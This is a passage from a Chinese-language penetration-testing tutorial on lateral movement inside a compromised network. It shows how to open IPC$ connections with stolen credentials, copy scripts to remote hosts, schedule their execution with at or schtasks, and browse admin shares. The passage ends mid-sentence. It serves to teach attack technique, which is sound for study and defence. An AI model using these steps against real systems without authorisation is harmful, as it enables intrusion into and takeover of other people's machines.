在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令及相关工具的使用,在已知目标系统的用户明文密码或者hash的基础上,直接可以在远程主机上执行命令。

 

一、利用流程

    1. 建立IPC链接到目标主机

    2. 拷贝要执行的命令脚本到目标主机

    3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本

    4. 删除IPC链接

 

二、IPC

    1. IPC简介及使用

        IPC是专用管道,可以实现对远程计算机的访问,需要使用目标系统用户的账号密码,使用139、445端口。创建IPC链接可以使用如下的命令:

net use \\server\ipc$"password" /user:username # 链接工作组机器
net use \\server\ipc$"password" /user:domain\username # 链接域内机器

其中ipc$可以换成具体的盘符或者路径,如D$、C:\\Windows\Temp……IPC的使用如下:

dir \\192.168.72.128\C$\                # 查看文件列表
copy  \\192.168.72.128\C$\1.bat  1.bat  # 下载文件
copy  1.bat  \\192.168.72.128\C$\1.bat  # 上传文件
net use \\192.168.72.128\C$\1.bat /del  # 删除IPC
net share ipc$ | admin$                 # 开启逻辑共享(C$、D$、E$……)或者 系统共享(ADMIN$)
net view 192.168.72.128                 # 查看对方共享

 注意:如果路径中出现空格,用双引号引起来如:dir \\server\C$\Windows\"Top secret.rar"。如果是用ip建立的ipc,必须用ip运行上述命令,如果用的计算机名建立的ipc,也必须用计算机名运行上述的命令。

 

    2. 建立IPC常见的错误代码

    (1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限

    (2)51:网络问题,Window